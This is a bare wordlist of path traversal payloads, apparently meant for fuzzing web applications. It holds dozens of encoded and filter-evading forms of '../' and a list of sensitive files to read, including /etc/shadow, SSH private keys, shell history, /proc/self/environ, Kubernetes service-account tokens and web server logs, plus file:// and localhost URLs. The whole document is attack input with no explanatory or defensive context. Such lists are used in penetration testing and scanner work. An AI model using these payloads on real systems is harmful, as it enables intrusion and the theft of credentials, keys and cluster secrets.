../../
..\..\
..\/
..\/..\/
%2e%2e%2f
%252e%252e%252f
%c0%ae%c0%ae%c0%af
%uff0e%uff0e%u2215
%uff0e%uff0e%u2216
. = %u002e
/ = %u2215
\ = %u2216
. = %c0%2e, %e0%40%ae, %c0ae
/ = %c0%af, %e0%80%af, %c0%2f
\ = %c0%5c, %c0%80%5c
..;/
..;/..;/
. = %252e
/ = %252f
\ = %255c
file:///etc/passwd
http://127.0.0.1:8080
/etc/issue
/etc/passwd
/etc/shadow
/etc/group
/etc/hosts
/etc/motd
/etc/mysql/my.cnf
/proc/[0-9]*/fd/[0-9]
/proc/self/environ
/proc/version
/proc/cmdline
/proc/sched_debug
/proc/mounts
/proc/net/arp
/proc/net/route
/proc/net/tcp
/proc/net/udp
/proc/self/cwd/index.php
/proc/self/cwd/main.py
/home/$USER/.bash_history
/home/$USER/.ssh/id_rsa
/run/secrets/kubernetes.io/serviceaccount/token
/run/secrets/kubernetes.io/serviceaccount/namespace
/run/secrets/kubernetes.io/serviceaccount/certificate
/var/run/secrets/kubernetes.io/serviceaccount
/var/lib/mlocate/mlocate.db
/var/lib/mlocate.db
/var/log/apache/access.log
/var/log/apache/error.log
/var/log/httpd/error_log
/usr/local/apache/log/error_log
/usr/local/apache2/log/error_log
/var/log/nginx/access.log
/var/log/nginx/error.log
/var/log/vsftpd.log
/var/log/sshd.log
/var/log/mail
%252e%252e/%252e%252e/
../../
%2e%2e%2f
/usr/local/apache
..%252f..%252f
%252e%252e/%252e%252e/
..\..\
..%255c..%255c
%2e%2e\%2e%2e\
%2e%2e%5c
%252e%252e
%252e%252e%255c
..%c0%af
%c0%ae%c0%ae
%c0%ae%c0%ae%c0%af
..%25c0%25af
%25c0%25ae%25c0%25ae
..%c1%9c
%c0%ae%c0%ae
..%25c1%259c
%25c0%25ae%25c0%25ae
%25c0%25ae%25c0%25ae%25c1%259c
..%%32%66
%%32%65%%32%65
..%2f..%2f
..%252f..%252f
..%5c..%5c
%252e%252e%255c
///%2e%2e%2f
\\\%2e%2e%5c
..///..
..\\\..
.\/\.\
./.././
AAAAAAAAAAAA/..
..../..../
%uff0e%uff0e
0x2e0x2e\0x2e0x2e
..///..
.\/\.\
..%010x2f..%010x2f
..%01%252f..%01%252f
.?/.?/
/..%uF025
